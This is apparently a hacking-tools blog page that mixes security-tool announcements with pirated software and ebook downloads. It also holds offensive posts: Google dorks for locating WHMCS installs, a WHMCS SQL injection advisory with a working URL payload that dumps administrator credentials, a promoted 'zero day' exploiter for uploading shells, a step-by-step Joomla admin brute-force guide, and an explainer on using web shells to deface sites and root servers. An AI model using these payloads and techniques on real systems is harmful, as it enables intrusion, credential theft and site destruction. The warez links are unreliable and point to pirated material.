IronWASP

IronWASP (Iron Web application Advanced Security testing Platform) is an open source system for web application vulnerability testing. It is designed to be customizable to the extent where users can create their own custom security scanners using it. Though an advanced user with Python/Ruby scripting expertise would be able to make full use of the platform, a lot of the tool’s features are simple enough to be used by absolute beginners.

 What’s new in IronWASP v0.9.6.5


IronWASP v0.9.6.5 is now available for download. Users of older versions should get an update prompt when using IronWASP. This is what you get with the new version.

  • Completely redesigned awesome new Results section
  • Support for editing, scanning and fuzzing SOAP messages
  • New active checks for Server Side Includes, Sever Side Request Forgery and Expression Language Injection
  • New passive check for JSON messages that are vulnerable to JSON hijacking
  • Significantly faster and robust parsers for XML, JSON and Multi-part messages with auto-detection support
  • Enhancements to the Payload Effect Analysis feature
  • Enhancements to the Scan Trace Viewer feature
  • Ability to create Request in Manual Testing section from clipboards
  • New Network address parsing APIs
  • Update to FiddlerCore v2.4.4.8
Download IronWASP v0.9.6.5

0 comments:

Never Forget To Say Thanks :D

WordPress All-in-One For Dummies, 2nd edition


Top WordPress guide, now fully updated for the latest WordPress release!
This updated new edition comprises one of the largest collections of practical intermediate to advanced information on WordPress. Fully updated for the latest WordPress release, this in-depth book covers it all, from setting up your software to publishing your site, using SEO and social media, developing and using plug-ins, running multiple sites with WordPress, and more. Veteran author Lisa Sabin-Wilson is a top authority on WordPress, and she and her co-authors pack this book with essential and easy-to-follow tips, techniques, and advice.
Presents straightforward and easy-to-understand intermediate to advanced coverage of the WordPress, the most popular blog software in use today
Features eight minibooks that cover what you need to know in depth, including WordPress basics, setting up the software, exploring the dashboard, publishing your site with WordPress, using SEO and social media, customizing the look of your site, using plug-ins, and running multiple sites with WordPress
Covers the very latest release of WordPress
Get up to speed on WordPress with WordPress All-in-One For Dummies, 2nd Edition,and turn your hobby into a business!

Download:
icon WordPress All-in-One For Dummies, 2nd edition ExpressLeech (37.4 MB)
icon WordPress All-in-One For Dummies, 2nd edition Davvas (37.4 MB)
icon WordPress All-in-One For Dummies, 2nd edition Hipfile (37.4 MB)
icon WordPress All-in-One For Dummies, 2nd edition Uploaded (37.4 MB)

0 comments:

Never Forget To Say Thanks :D

Metasploit Framework Expert(Video tutorial)


Best and complete video tutorial of Metasploit Framework...

Metasploit Framework is one of the best tools for hackers for hacking remote windows computers, this software contain allot of windows exploits, some of this exploits until now don't fixed by Microsoft and hackers can easily hack windows computers by using of this exploits with Metasploit, This security framework has allot of usage not only for those want to hack someone it's recommended also for those want to improve their system security and prevent from client hackers, I used Metasploit Framework something like 5 year ago and it's was prefect, This video course created by SecurityTube(Best security video tutorials maker) and helps you to learn completely Metasploit Framework, this course instructor is Mr.Vivek Ramachandran, he is one of the most powerful and famous Indian security experts, also the author of the book “Backtrack 5 Wireless Penetration Testing“. His book “The Metasploit Megaprimer” focussed on Advanced Metasploit usage for Pentesting and Exploit Development is up for release in March 2013...

Download:
icon Metasploit Framework Expert Part1 (300 MB)
icon Metasploit Framework Expert Part2 (300 MB)
icon Metasploit Framework Expert Part3 (300 MB)
icon Metasploit Framework Expert Part4 (300 MB)
icon Metasploit Framework Expert Part5 (300 MB)
icon Metasploit Framework Expert Part6 (297 MB)

0 comments:

Never Forget To Say Thanks :D

Homefront (PC/SKIDROW)

The year is 2027. Her infrastructure shattered and military in disarray, America has fallen to a savage occupation by the nuclear armed Greater Korean Republic. Abandoned by her former allies, the United States is a bleak landscape of walled towns and abandoned suburbs.

Minimum System Requirements:
Windows XP, Windows Vista or Windows 7
Intel Pentium Core 2 Duo 2.4 GHz or AMD Athlon X2 2.8GHz.
2 GB RAM
Shader Model 3.0 graphics card with 256MB of memory
NVIDIA GeForce 7900GS
10GB of free hard drive space
Recommended System Requirements:
Windows Vista or Windows 7
Quad Core 2 GHz+ CPU
2 GB RAM
NVIDIA GeForce 2607
10 GB of free hard drive space

Download:
icon Homefront Part1 Multimirror (953 MB)
icon Homefront Part2 Multimirror (953 MB)
icon Homefront Part3 Multimirror (953 MB)
icon Homefront Part4 Multimirror (953 MB)
icon Homefront Part5 Multimirror (953 MB)
icon Homefront Part6 Multimirror (953 MB)
icon Homefront Part7 Multimirror (953 MB)
icon Homefront Part8 Multimirror (953 MB)
icon Homefront Part9 Multimirror (73 MB)

Download:
icon Homefront UptoBox (7.5 GB)
icon Homefront TusFiles (7.5 GB)
icon Homefront Uploadinc (7.5 GB)
icon Homefront FileRio (7.5 GB)


0 comments:

Never Forget To Say Thanks :D

Ubuntu 13.10 Final x86/x64

Fast, free and incredibly easy to use, the Ubuntu operating system powers millions of desktop PCs, laptops and servers around the world. To use Ubuntu is to fall in love with it. The desktop environment is intuitive but powerful, so you can work quickly and accomplish all you can imagine. You’ll be captivated by its elegance. You can surf in safety with Ubuntu — confident that your files and data will stay protected — thanks to the built-in firewall and virus protection. And if a potential vulnerability appears, we provide automatic updates which you can install in a single click.
Ubuntu loads quickly on any computer, but it’s super-fast on newer machines. With no unnecessary programs or trial software to slow things down, you can boot up and open a browser
in seconds.

iconUbuntu 13.10 32-bit (895.00 MB)
iconUbuntu 13.10 64-bit (883.00 MB)


0 comments:

Never Forget To Say Thanks :D

OWASP Zed Attack Proxy 2.2.1

OWASP Zed Attack Proxy (ZAP) An easy to use integrated penetration testing tool for finding vulnerabilities in web applications. It is designed to be used by people with a wide range of security experience and as such is ideal for developers and functional testers who are new to penetration testing as well as being a useful addition to an experienced pen testers toolbox.


Some of ZAP’s features:
  • Intercepting Proxy
  • Automated scanner
  • Passive scanner
  • Brute Force scanner
  • Spider
  • Fuzzer
  • Port scanner
  • Dynamic SSL certificates
  • API
  • Beanshell integration
Some of ZAP’s characteristics:
  • Easy to install (just requires java 1.6)
  • Ease of use a priority
  • Comprehensive help pages
  • Fully internationalized
  • Under active development
  • Open source
  • Free (no paid for ‘Pro’ version)
  • Cross platform
  • Involvement actively encouraged

0 comments:

Never Forget To Say Thanks :D

Web-Sorrow v1.5

Web-Sorrow is a perl based tool for misconfiguration, version detection, enumeration, and server information scanning. It's entirely focused on Enumeration and collecting Info on the target server. Web-Sorrow is a "safe to run" program, meaning it is not designed to be an exploit or perform any harmful attacks.

Web Services: a CMS and it's version number, Social media widgets and buttons, Hosting provider, CMS plugins, and favicon fingerprints

Authentication areas: logins, admin logins, email webapps

Bruteforce: Subdomains, Files and Directories

Stealth: with -ninja you can gather valuable info on the target with as few as 6 requests, with -shadow you can request pages via google cache instead of from the host

AND MORE: Sensitive files, default files, source disclosure, directory indexing, banner grabbing (see below for full capabilities)

 Download Web-Sorrow v1.5
 

0 comments:

Never Forget To Say Thanks :D

OWASP Zed Attack Proxy 2.1.0

The OWASP Zed Attack Proxy (ZAP) is an easy to use integrated penetration testing tool for finding vulnerabilities in web applications.

It is designed to be used by people with a wide range of security experience and as such is ideal for developers and functional testers who are new to penetration testing as well as being a useful addition to an experienced pen testers toolbox.


Some of ZAP's functionality:


Some of ZAP's features:

  • Open source
  • Cross platform
  • Easy to install (just requires java 1.7)
  • Completely free (no paid for 'Pro' version)
  • Ease of use a priority
  • Comprehensive help pages
  • Fully internationalized
  • Translated into a dozen languages
  • Community based, with involvement actively encouraged
  • Under active development by an international team of volunteers

It supports the following languages:

  • English
  • Arabic
  • Albanian
  • Brazilian Portuguese
  • Chinese
  • Danish
  • Filipino
  • French
  • German
  • Greek
  • Indonesian
  • Italian
  • Japanese
  • Korean
  • Persian
  • Polish
  • Russian
  • Spanish 


0 comments:

Never Forget To Say Thanks :D

Matriux Leandros v3.0

Matriux is a Debian-based security distribution designed for penetration testing and forensic investigations. Although it is primarily designed for security enthusiasts and professionals, it can also be used by any Linux user as a desktop system for day-to-day computing. Besides standard Debian software, Matriux also ships with an optimised GNOME desktop interface, over 340 open-source tools for penetration testing, and a custom-built Linux kernel.


Matriux was first released in 2009 under code name “lithium” and then followed by versions like “xenon” based on Ubuntu. Matriux “Krypton” then followed in 2011 where we moved our system to Debian. Other versions followed for Matriux “Krypton” with v1.2 and then Ec-Centric in 2012. This year we are releasing Matriux “Leandros” RC1 on 2013-09-27 which is a major revamp over the existing system.

Matriux arsenal is divided into sections with a broader classification of tools for Reconnaissance, Scanning, Attack Tools, Frameworks, Radio (Wireless), Digital Forensics, Debuggers, Tracers, Fuzzers and other miscellaneous tool providing a wider approach over the steps followed for a complete penetration testing and forensic scenario. Although there are were many questions raised regarding why there is a need for another security distribution while there is already one. We believed and followed the free spirit of Linux in making one. We always tried to stay updated with the tool and hardware support and so include the latest tools and compile a custom kernel to stay abreast with the latest technologies in the field of information security. This version includes a latest section of tools PCI-DSS.
Matriux is also designed to run from a live environment like a CD/ DVD or USB stick which can be helpful in computer forensics and data recovery for forensic analysis, investigations and retrievals not only from Physical Hard drives but also from Solid state drives and NAND flashes used in smart phones like Android and iPhone. With Matriux Leandros we also support and work with the projects and tools that have been discontinued over time and also keep track with the latest tools and applications that have been developed and presented in the recent conferences.

Features (notable updates compared to Ec-Centric):
• Custom kernel 3.9.4 (patched with aufs, squashfs and xz filesystem mode, includes support for wide range of wireless drivers and hardware) Includes support for alfacard 0036NH
• USB persistent
• Easy integration with virtualbox and vmware player even in Live mode.
• MID has been updated to make it easy to install check http://www.youtube.com/watch?v=kWF4qRm37DI
• Includes latest tools introduced at Blackhat 2013 and Defcon 2013, Updated build until September 22 2013.
• UI inspired from Greek Mythology
• New Section Added PCI-DSS
• IPv6 tools included.

0 comments:

Never Forget To Say Thanks :D

WHMCS 0day Auto Exploiter <= 5.2.8

inurl:submitticket.php site:.com
inurl:submitticket.php site:.net
inurl:submitticket.php site:.us
inurl:submitticket.php site:.eu
inurl:submitticket.php site:.org
inurl:submitticket.php site:.uk
intext:"Powered by WHMCompleteSolution"
intext:"Powered by WHMCompleteSolution" inurl:clientarea.php
inurl:announcements.php intext:"WHMCompleteSolution"
intext:"Powered by WHMCS"


Here is the PHP code that you must save as WHMCS-Fucker.php:

0 comments:

Never Forget To Say Thanks :D

WHMCS 4.x SQL Injection Vulnerability

# Title: WHMCS 4.x SQL Injection Vulnerability
# Google Dork: intext:"Powered by WHMCompleteSolution" OR inurl:"submitticket.php‎"‎
# Author: Ahmed Aboul-Ela
# Contact: Ahmed.Aboul3la[at]gmail[dot]com
# Date: 14/5/2013
# Vendor: http://www.whmcs.com
# Version: 4.5.2 and perior versions should be affected too
# Tested on: Linux

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 Sql Injection Vulnerability in "/includes/invoicefunctions.php"
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

    - Vulnerable Code Snippet :
   
      LINE 582: function pdfInvoice($id)
      LINE 583: {
      LINE 686: if ($CONFIG['GroupSimilarLineItems'])
      LINE 687: {
      LINE 688: $result = full_query('' . 'SELECT COUNT(*),id,type,relid,description,amount,taxed FROM tblinvoiceitems WHERE invoiceid=' . $id . ' GROUP BY `description`,`amount` ORDER BY id ASC');
      LINE 689: }
     
     As we can see here the $id argument of pdfInvoice function have been used directly at mysql query without any sanitization which leads directly to Sql Injection
     It appears that pdfInvoice function is being called at "/dl.php" file as the following:
   
   
      LINE 21: if ($type == 'i')
      LINE 22: {
      LINE 23: $result     = select_query('tblinvoices', '', array(
      LINE 24: 'id' => $id
      LINE 25: ));
      LINE 26: $data       = mysql_fetch_array($result);
      LINE 27: $invoiceid  = $data['id'];
      LINE 28: $invoicenum = $data['invoicenum'];
      LINE 29: $userid     = $data['userid'];
      LINE 30: if ((!$_SESSION['adminid'] && $_SESSION['uid'] != $userid))
      LINE 31: {
      LINE 32: downloadLogin();
      LINE 33: }
      LINE 34: if (!$invoicenum)
      LINE 35: {
      LINE 36: $invoicenum = $invoiceid;
      LINE 37: }
      LINE 38: require('includes/clientfunctions.php');
      LINE 39: require('includes/countries.php');
      LINE 40: require('includes/invoicefunctions.php');
      LINE 41: require('includes/tcpdf.php');
      LINE 42: $pdfdata = pdfInvoice($id);
      LINE 43: header('Pragma: public');
      LINE 44: header('Expires: Mon, 26 Jul 1997 05:00:00 GMT');
      LINE 45: header('Last-Modified: ' . gmdate('D, d M Y H:i:s') . ' GMT');
      LINE 46: header('Cache-Control: must-revalidate, post-check=0, pre-check=0, private');
      LINE 47: header('Cache-Control: private', false);
      LINE 48: header('Content-Type: application/octet-stream');
      LINE 49: header('Content-Disposition: attachment; filename="' . $invoicenum . '.pdf"');
      LINE 50: header('Content-Transfer-Encoding: binary');
      LINE 51: echo $pdfdata;
      LINE 52: exit();
      LINE 53: return 1;
      LINE 54: }
     
     
      As we can see at LINE "42" the pdfInvoice function have been called and passed $id Variable without any sanitization
      Afterwards it force the browser to download the generated invoice in PDF format
   
      - Proof of Concept for Exploitation
   
        To Dump Administrator Credentials (user & pass):
     
        http://www.site.com/whmcs/dl.php?type=i&id=1 and 0x0=0x1 union select 1,2,3,4,CONCAT(username,0x3a3a3a,password),6,7 from tbladmins --
     
        ~ Result: The Browser will prompt download for the pdf invoice file after opening it you should find the username and pw hash there :)
       
      - Precondition to Successfully Exploit the Vulnerability:
   
"Group Similar Line Items" Option should be Enabled at the Invoices Settings in the WHMCS Admin ( It should be Enabled by default )

      - Credits:

        Ahmed Aboul-Ela - Information Security Consultant @ Starware Group

0 comments:

Never Forget To Say Thanks :D

HyperCam 3.5.1310.24


HyperCam is powerful video capture software that records AVI movies (screencam) directly from your monitor, for software presentations, software training, demos, tutorials, and fun! HyperCam supports text annotations, sound, and screen notes (great for creating automated software demos!).
You can also select Frame rate and compression quality prior to video capture. This format can be played under Windows, as well as the Internet, unlike other programs that use proprietary formats that may need special viewers and be difficult, if not impossible, to edit.
HyperCam captures the action from your Windows screen and saves it to AVI (Audio-Video Interleaved) movie file. Sound from your system microphone is also recorded. Please note that HyperCam is not intended for re-recording of other video clips from the screen (e.g. playing in Media Player, RealVideo, QuickTime etc.), but rather for creating regular software presentations, tutorial, demos etc.

0 comments:

Never Forget To Say Thanks :D

Acunetix Consultant Edition 9

Audit your website security with Acunetix Web Vulnerability Scanner. As many as 70% of web sites have vulnerabilities that could lead to the theft of sensitive corporate data such as credit card information and customer lists. Hackers are concentrating their efforts on web-based applications - shopping carts, forms, login pages, dynamic content, etc. Accessible 24/7 from anywhere in the world, insecure web applications provide easy access to backend corporate databases. Firewalls, SSL and locked-down servers are futile against web application hacking! Web application attacks, launched on port 80/443, go straight through the firewall, past operating system and network level security, and right in to the heart of your application and corporate data. Tailor-made web applications are often insufficiently tested, have undiscovered vulnerabilities and are therefore easy prey for hackers.

0 comments:

Never Forget To Say Thanks :D

WHMCS Exploiter V2.0


This is zero day exploit and New Private tool
You Can Easy Upload Shell On Whmcs And Hack It. Happy hacking!

Download

0 comments:

Never Forget To Say Thanks :D

Web Penetration Testing with Kali Linux



Title: Web Penetration Testing with Kali Linux
By:
Joseph MunizAamir Lakhani
Publisher:
Packt Publishing
Formats:
  • Ebook
Ebook:
September 2013
Pages:
342
Ebook ISBN:
978-1-78216-317-6
| ISBN 10:
1-78216-317-4


0 comments:

Never Forget To Say Thanks :D

Burp Suite Professional v1.5

Burp Suite is an integrated platform for performing security testing of web applications. Its various tools work seamlessly together to support the entire testing process, from initial mapping and analysis of an application's attack surface, through to finding and exploiting security vulnerabilities.

Burp gives you full control, letting you combine advanced manual techniques with state-of-the-art automation, to make your work faster, more effective, and more fun.

Burp Suite contains the following key components:

    An intercepting Proxy, which lets you inspect and modify traffic between your browser and the target application.
    An application-aware Spider, for crawling content and functionality.
    An advanced web application Scanner, for automating the detection of numerous types of vulnerability.
    An Intruder tool, for performing powerful customized attacks to find and exploit unusual vulnerabilities.
    A Repeater tool, for manipulating and resending individual requests.
    A Sequencer tool, for testing the randomness of session tokens.
    The ability to save your work and resume working later.
    Extensibility, allowing you to easily write your own plugins, to perform complex and highly customized tasks within Burp.

Burp is easy to use and intuitive, allowing new users to begin working right away. Burp is also highly configurable, and contains numerous powerful features to assist the most experienced testers with their work.

0 comments:

Never Forget To Say Thanks :D

How to Bruteforce Joomla Administrator Login

So, you want to hack Joomla website with bruteforce method? Ok, there’s one tool that works effectively for this, that is “BJoomla” built in Python. The latest working version is BJoomla version 3, works for Joomla version 1.5.x, 2.x, and 3.x. I have tried this tool about 4 months ago, the bruteforce process works very fast as it stated on its official website. But this depends on your internet connection speed also.
Download here:
How to use it?
1/ Download and save it anywhere in your comp.
2/ If you’re using Windows, dont forget to set the variable path for Python, so that you can easily execute/run any Python script anywhere in your drive. In Linux, you dont need to set variable path for Python as it’s automatically be executed on command shell, except you’re non-root and placed the Python installation files locally. You need to set the path by editing .bashrc & .bash_profile for the spesific user.
# (Non-root) Set variable path for Python on Linux:
- Edit .bashrc & .bash_profile
- Add this line (path dir may differ, depends on your local python installation dir) :
PATH=/home/[user]/[dir]/localpython/bin:$PATH
export PATH
- Compile those 2 files so that they will take effect immediately:
$ source .bashrc
$ source .bash_profile
# Set variable path for Python on Windows:
- Right click My Computer –> click Properties –> Click tab Advanced –> Click button “Environment Variables”
- See the “System Variables” frame, there are 2 columns “Variables” and “Value”. Scroll down and choose Path, then click Edit
- Add this new variable path in the last string:
C:\PYTHON27;C:\PYTHON27\DLLS;C:\PYTHON27\LIB;C:\PYTHON27\LIB\LIB-TK;C:\PYTHON27\SCRIPTS;
Note that my path might be different with yours, since I sometimes install new module/addon script for my Phython to run certain program using easy_install command.
- Then click save.
2/ Prepare for users.txt and pass.txt file. Default Joomla user would be “admin”. But, start from Joomla 2.5.x, admin user could be anything username set by the administrator/owner, it could be admin, root, administrator, owner, sitename, or anything. Just guess.
eg:
- users.txt file contains:
admin
administrator
root
sitename
sales
info
.. [anything]
- pass.txt file is your wordlist. More wordlist means more time to bruteforce. Wordlist string should be set per line.
users.txt and pass.txt files should be placed in same dir with the BJoomla.py script, just for easily command.
3/ Start to bruteforce.
$ python BJoomla.py
Bjoomla v3.0 (c)2012 by Zonesec - a very fast logon Joomla Cracker - support all version
Website: http://www.zonesec.com
Mail   : zonesec@gmail.com

Syntax: python BJoomla [-u USER|-U FILE] [-p PASS|-P FILE] -h URL [OPT]
Options:
-h URL
-H Filename - URL list from file
-U file contain list user
-P file contain list password
-u username
-p password
-v verbose mode / show login+pass combination for each attempt (no scroll)
-vv verbose mode / show login+pass combination for each attempt
-f continue after found login/password pair
-g user-agent - default: "Mozilla/5.0 (Windows NT 6.1; rv:5.0) Gecko/20100101 Firefox/5.0"
-x use proxy | ex: 127.0.0.1:1234
Examples: python Bjoomla.py -h http://test.com/administrator -u admin -P password.txt

Just read and understand the command above.
For example:
$ python BJoomla.py -h http://targetsite.com/administrator -U users.txt -P pass.txt -vv
Note that, if the Joomla administrator page has been password protected using .htpasswd, then this script would not work. This script works by reading the token, username, and password fields from the “form-login” form.
If you want to bruteforce for the password protected page, then you should use another script based on basic REALM authentication script.

1 comments:

Never Forget To Say Thanks :D

What is Shell And How to Use it?

After getting the admin access in the website attacker will upload his own control penal 

that’s called shell. It helps attacker to maintain access for the long time. There are many 

types of shells like DDOS shell, symlink shell etc.

Using shell attacker can destroy whole database and he can leak the database of the website 

and using the shell he can root the server. (Only Linux server can be rooted windows server 

cant be rooted because there is no ROOT :P) After rooting he can destroy whole server. 

Suppose One server contains 500 websites and attacker got the admin access in the single 

site and he have rooted that server then 500 sites can be destroyed !
USES OF SHELL

1. Using shell you can Destroy the INDEX page of the website.
2. You can host your files in the Server.
3. You can root the server.

Now if you want to destroy the index page of the website then find the “INDEX” page from 

the list and replace that coding with your own deface page. And using browse option you can 

host your own file in the server. You can create your own shell and you can add your own 

tools in your shell for that you know PHP.

0 comments:

Never Forget To Say Thanks :D

Copyright © 2013 Hacking Tools and Tech eBooks Collection and Blogger Templates - Anime OST.